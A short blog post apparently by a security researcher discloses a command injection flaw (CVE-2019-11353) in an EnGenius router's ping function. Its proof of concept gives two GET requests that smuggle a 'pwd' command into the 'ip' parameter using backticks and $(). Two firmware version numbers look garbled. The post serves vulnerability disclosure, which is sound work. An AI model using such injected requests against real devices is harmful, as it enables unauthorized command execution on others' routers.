Hello, from the other side of the ether!
Just making a quick post to briefly highlight an arbitrary code execution flaw in an EnGenius router. You can find more information regarding this flaw below:
CVE Founder: Max Segura
Version: Firmware 2.0.284
Vulnerability: Arbitrary Code Execution
Fix Discovered: 4-15-19 on ticket #12727
National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2019-11353
It is important to note that this flaw impacts the annotated version above, but could potentially affect other versions except the latest version of 126.96.36.199 that is currently available. If you are a business using this type of device, you are encouraged to visit the EnGenius main website at https://www.engeniustech.com/engenius-firmware-updates.html to keep your products up to date.
Remember to test responsibly and only on devices you own 🙂
Proof of Concept
This router supports a myriad of functions and utilities through BusyBox. Two utilities that the router uses are ping and traceroute. These can be abused to run alternate commands by using “ or $().
“ and $() are enabled functions on the router’s core operating system that allows command substitution or execution by allowing these commands to be evaluated within another command.
Here are some images demonstrating how you can alter the requests sent to the router then seeing the output on the page.
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=`pwd`&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1
You can also send the following using $():
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=$(pwd)&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1
This flaw was fixed on firmware version 188.8.131.52, please be sure to check the link above to upgrade your devices.
Until next time,